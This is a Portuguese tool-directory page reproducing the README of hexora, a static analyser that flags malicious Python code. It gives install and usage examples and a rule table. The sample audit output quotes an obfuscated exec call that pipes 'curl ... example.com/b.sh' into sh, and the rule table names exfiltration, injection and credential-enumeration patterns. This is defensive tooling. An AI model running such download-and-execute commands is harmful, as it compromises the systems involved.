Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
hexora — Análise estática de código Python malicioso | Kitploit
Ferramentas/GitHubGitHub/rushter/hexora
Gerenciamento de Indicadores de Comprometimento (IOC)Análise EstáticaAnálise de VulnerabilidadesAnálise de CódigoAnálise de MalwareSegurança da Cadeia de SuprimentosAprendizado de Máquina
GitHubrushter/hexora

hexora

Análise estática de código Python malicioso

Ver Repositório
1688há 14 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

hexora

PyPI - Version

Hexora é uma ferramenta de análise estática projetada para detectar padrões maliciosos e prejudiciais em código Python. Ela combina um motor de análise estática baseado em regras com um modelo de aprendizado de máquina que pontua arquivos-fonte inteiros para classificá-los como maliciosos ou benignos.

Pode ser usada para:

  • Auditar dependências de projetos para capturar potenciais ataques à cadeia de suprimentos
  • Detectar scripts maliciosos encontrados em plataformas como Pastebin, GitHub ou diretórios abertos
  • Analisar arquivos de IoC de incidentes de segurança passados
  • Auditar novos pacotes enviados ao PyPi.
Exemplo do Hexora

Exemplos

Para exemplos de saída, consulte o arquivo docs/examples.md.

Instalação

Usando Python

Requer Python 3.9+.

root@kitploit:~
pip install hexora

Usando uv:

root@kitploit:~
uv tool install hexora

Uso

root@kitploit:~
hexora --help

Auditar arquivo único

root@kitploit:~
>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.
    Machine learning based score for file: 0.93

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

Auditar diretório

root@kitploit:~
hexora audit --output-format terminal resources/test/

Auditar pacotes de ambiente virtual

root@kitploit:~
hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

Onde python3.11 é a versão do Python no ambiente virtual.

Dicas:

  • Use --exclude para suprimir certos códigos de regra (por exemplo, importações ruidosas) para uma execução específica
  • Use --min-confidence para focar apenas em descobertas de alta confiança.

Confiança indica o quão malicioso um determinado trecho de código é. Algumas bibliotecas ou trechos de código são usados para fins legítimos, e é difícil distinguir casos de uso legítimos dos maliciosos. É por isso que algumas correspondências têm um baixo nível de confiança.

Algumas regras podem ter diferentes níveis de confiança. Evite filtrar muitas regras por código a menos que tenha muita certeza. Por exemplo, execução de código e shell podem ter confiança média, alta e muito alta. Isso depende de como o código foi executado. Se detectarmos uma tentativa de ofuscação, elevamos a confiança.

Por exemplo, este código terá alta confiança:

root@kitploit:~
globals()["__builtins__"].eval("print(123)")

Uso em Python

root@kitploit:~
>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

Testando contra Conjunto de Dados Maliciosos

Ao desenvolver novas regras, você pode usar conjuntos de dados maliciosos existentes, como o malicious-software-packages-dataset.

Após clonar, aponte a ferramenta de benchmark para o diretório do conjunto de dados:

root@kitploit:~
cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

Regras disponíveis

Novas regras são adicionadas regularmente.

No momento, as seguintes regras estão disponíveis:

Créditos

Para análise, usamos o analisador AST da biblioteca ruff.

Baixar ferramenta
CódigoNomeDescrição
HX1000AppEnumerationEnumeração suspeita de aplicativos.
HX1010BrowserEnumerationEnumeração suspeita de navegador (aplicativos, cookies, histórico, etc.).
HX1020PathEnumerationEnumeração suspeita de caminhos.
HX1030OSFingerprintImpressão digital suspeita do SO.
HX2000ClipboardReadLeitura da área de transferência.
HX2010EnvAccessAcesso a uma variável de ambiente sensível.
HX2020ScreenshotCaptureCaptura de capturas de tela do display.
HX3000CodeExecPossível execução de código.
HX3010ShellExecExecução de um comando shell.
HX3040DLLInjectionPossível injeção de DLL.
HX3050DangerousExecExecução de comando potencialmente perigoso dentro de um comando shell.
HX3060SuspiciousCallChamada de função suspeita.
HX4000ObfuscatedShellExecExecução de comando shell possivelmente ofuscado.
HX4010ObfuscatedCodeExecExecução de código possivelmente ofuscado.
HX5000DunderImportUso suspeito de __import__.
HX5010SuspiciousImportImportação suspeita.
HX5020CtypesImportImportação suspeita de ctypes.
HX5030PickleImportImportação suspeita de pickle.
HX5040StructImportImportação suspeita de struct.
HX5050SocketImportImportação suspeita de socket.
HX5060MarshalImportImportação suspeita de marshal.
HX6000Base64StringString longa codificada em Base64 detectada; possível ofuscação de código.
HX6010HexedLiteralsLista de literais codificados em hex detectada; possível payload.
HX6020HexedStringString longa codificada em hex detectada; possível payload.
HX6030IntLiteralsGrande lista de literais inteiros detectada; possível ofuscação de código.
HX6040CVEInLiteralLiteral contém um identificador CVE.
HX6050SuspiciousLiteralLiteral suspeito detectado; possível enumeração de dados.
HX6060PathTraversalPath traversal suspeito.
HX6070BrowserExtensionEnumeração de extensões de navegador sensíveis.
HX6080WebHookWebhook suspeito detectado. Possível exfiltração de dados.
HX6090TelegramTokenToken de bot do Telegram detectado em literal de string.
HX7000SuspiciousFunctionNameNome de função suspeito.
HX7010SuspiciousParameterNameNome de parâmetro suspeito.
HX7020SuspiciousVariableNome de variável suspeito.
HX9000DataExfiltrationPotencial exfiltração de dados.
HX8000BinaryDownloadDownload suspeito de binário.
HX8010BuiltinsVariableUso suspeito de variável embutida.
HX8020SuspiciousCommentComentário suspeito.
HX8030SuspiciousWriteEscrita suspeita no sistema de arquivos.
HX8040InstallHookConfiguração suspeita de hook de instalação.